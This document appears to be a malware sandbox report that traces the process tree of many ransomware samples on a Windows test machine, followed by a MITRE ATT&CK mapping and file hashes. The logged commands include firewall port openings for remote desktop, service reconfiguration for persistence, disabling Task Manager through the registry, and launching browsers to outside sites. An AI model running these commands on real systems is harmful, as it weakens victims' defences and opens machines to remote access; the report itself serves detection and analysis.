- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 3389 "Terminal Server" enable all6⤵PID:5908
-
C:\Windows\System32\netsh.exenetsh firewall add portopening TCP 3389 "Terminal Server" enable all7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 80 "HTTP" enable all6⤵PID:5316
-
C:\Windows\System32\netsh.exenetsh firewall add portopening TCP 80 "HTTP" enable all7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 443 "HTTPS" enable all6⤵PID:6088
-
C:\Windows\System32\netsh.exenetsh firewall add portopening TCP 443 "HTTPS" enable all7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set service remotedesktop enable6⤵PID:3724
-
C:\Windows\System32\netsh.exenetsh firewall set service remotedesktop enable7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set service remotedesktop enable6⤵PID:5344
-
C:\Windows\System32\netsh.exenetsh firewall set service remotedesktop enable7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NET STOP TerminalService6⤵PID:6112
-
C:\Windows\system32\net.exeNET STOP TerminalService7⤵PID:6552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 STOP TerminalService8⤵PID:7544
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NET STOP SVCM6⤵PID:4872
-
C:\Windows\system32\net.exeNET STOP SVCM7⤵PID:5968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 STOP SVCM8⤵PID:7296
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc description SVCM "If this service is disabled, any services that explicitly depend on it will fail to start."6⤵PID:6584
-
C:\Windows\system32\sc.exesc description SVCM "If this service is disabled, any services that explicitly depend on it will fail to start."7⤵
- Launches sc.exe
PID:6860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config TermService depend= RPCSS/SVCM6⤵PID:5008
-
C:\Windows\system32\sc.exesc config TermService depend= RPCSS/SVCM7⤵
- Launches sc.exe
PID:8068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config TermService start= auto6⤵PID:7088
-
C:\Windows\system32\sc.exesc config TermService start= auto7⤵
- Launches sc.exe
PID:6940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NET START SVCM6⤵PID:5956
-
C:\Windows\system32\net.exeNET START SVCM7⤵PID:3772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 START SVCM8⤵PID:3260
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c NET STOP PcaSvc6⤵PID:6652
-
C:\Windows\system32\net.exeNET STOP PcaSvc7⤵PID:7804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 STOP PcaSvc8⤵PID:7044
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exeTrojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2572
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exeTrojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe3⤵
- Executes dropped EXE
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2556 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:msgbox("从老师处得到",64,"方法")(window.close)4⤵PID:5560
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exeTrojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe3⤵
- Checks computer location settings
- Executes dropped EXE
PID:116 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9277.tmp\9278.tmp\9279.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe"4⤵PID:3676
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exeTrojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\999B.tmp\999C.tmp\999D.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe"5⤵PID:3964
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\TunnelBear_Installer.sfx.exeTunnelBear_Installer.sfx.exe -p123 -dC:\Users\Admin\AppData\Local\Temp6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:5444 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A505.tmp\A506.tmp\A507.bat C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe"8⤵
- Checks computer location settings
PID:5660 -
C:\Windows\system32\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f9⤵
- Modifies registry key
PID:3044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -new-tab "https://ezstat.ru/21p753"9⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5964 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe93aecc40,0x7ffe93aecc4c,0x7ffe93aecc5810⤵PID:6136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2288 /prefetch:210⤵PID:3472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:310⤵PID:928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2584 /prefetch:810⤵PID:1700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3108 /prefetch:110⤵PID:5824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:110⤵PID:6164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:110⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:110⤵PID:7508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4652,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4388 /prefetch:810⤵PID:7428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4560,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:810⤵
- Modifies registry class
PID:7736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:810⤵PID:7948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5228,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:810⤵PID:6972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5784,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5792 /prefetch:110⤵PID:3524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4656,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5968 /prefetch:110⤵PID:7600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=756,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4476 /prefetch:810⤵PID:8060
-
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 2 -w 10009⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5180
-
-
C:\Windows\system32\cmd.execmd.exe9⤵PID:7068
-
-
C:\Windows\system32\cmd.execmd.exe9⤵PID:7404
-
-
C:\Windows\system32\cmd.execmd.exe9⤵PID:5432
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exeTrojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe3⤵
- Executes dropped EXE
PID:3184 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\96EC.tmp\96ED.tmp\96EE.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.zlq-6968672454eb2109222c6461c218a6152e51a606b15cc9133e014718c99b8949.exe"4⤵
- Drops file in Drivers directory
PID:4808
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exeTrojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\~9323.bat Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe4⤵
- Enumerates connected drives
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exeUDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3856
-
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exeUDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 19884⤵
- Program crash
PID:4492
-
-
-
C:\Users\Admin\Desktop\00417\UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exeUDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2324⤵
- Program crash
PID:5372
-
-
-
C:\Users\Admin\Desktop\00417\VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exeVHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5600 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.x5vv.com/4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:7896 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe851546f8,0x7ffe85154708,0x7ffe851547185⤵PID:1728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:25⤵PID:7332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:35⤵PID:7012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:85⤵PID:7208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵PID:7400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵PID:2512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4488 /prefetch:15⤵PID:7728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,1343696787233137213,6382905755544053112,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:15⤵PID:5876
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4168 -ip 41681⤵PID:2032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 692 -ip 6921⤵PID:2392
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f8 0x4641⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5288 -ip 52881⤵PID:5316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4712 -ip 47121⤵PID:6008
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\WERE_MY _FILES.txt1⤵PID:4652
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:6556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3492 -ip 34921⤵PID:7904
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3492 -ip 34921⤵PID:7188
-
\??\c:\Siemens\svcmain.exe"c:\Siemens\svcmain.exe"1⤵
- Allows Network login with blank passwords
- Executes dropped EXE
- Modifies WinLogon
PID:6264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:7160
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\a377c1d6833e490980c1c632810f2390 /t 5604 /p 56001⤵PID:7344
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7180
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4432 -ip 44321⤵PID:7292
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\___RECOVER__FILES__.locked.txt1⤵
- Opens file in notepad (likely ransom note)
PID:7672
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\93f6495ce696427cba1be9f1ea94cb55 /t 6324 /p 36041⤵PID:4424
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\c9d2af3bac1444fe94d5b8cbeb2cf613 /t 372 /p 25561⤵PID:4628
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Server Software Component
1Terminal Services DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
3Indicator Removal
1File Deletion
1Modify Registry
10Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Peripheral Device Discovery
2Query Registry
8Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54594df94a50a52dba2bb3b9ba91cc11f
SHA1f7cf9d3e664f8afc6ffc585980d90ccc287c9b1f
SHA2566495dc7973c8ef0d051ad0f762d6a0e85786c92c0568f506aa858839fa93fd43
SHA51257ec81726ad499ff7a7a2fac0e7d7595cb40cf7922eb1cf3d1df64313ec34cdae78967b8613d69ce45079ac143b3ada8d27aba2bfd9e6d7c9eefe2ccf2d38941
-
Filesize
292B
MD5211ae39d86c3a1f9d4432775f742b7c5
SHA13f540acfa1b2bfe8071745d618a8b3ed5a6f7e28
SHA25647874b88d9b8d714a2844fcb1188bf5ceeee37498fecd56f5f796257980ddd67
SHA512afe17ef9671c12eb8fc7c4c22c26722f2cea36010e2f2a0d95045753b76d12f05d7234ac11229174234e7c6aebe5aec3674041c349721d6a36a4977671e1e965
-
Filesize
116B
MD54033af7388763f9e0d96faa4979cfc39
SHA19d0a46cdee697101123c406df2243c771c3bd64c
SHA25675dfc32aa0927977c6c68486af06bdd64255b625a4977dbda0fc5ad7a69a8d66
SHA512259f64226df83cd77f3fee2e5ffe51662e7bf5356498791ed6a13e921296aad4743bbc6709a91cb7e93b39ab2c9e0710ee5dfde8e0cf0324adf28a3ad712543a
-
Filesize
4KB
MD5e1267a318cfc4204e4df15a049aab6c7
SHA19e1db464ff933f117ec7fa2a4082f845ca3767b2
SHA256ec43d27c529f54d6966037d8fa196ca5f0c99901151e30abb4c767c7b5e24d84
SHA51234dd7e18b5bb935886feaf4d2e5fc2ca0491dc85823a5e5a6a9e59650f67eff2ec83806a510724c1cb15e75208ed0584e810440844e41ef6bb7d836c5533fe6c
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
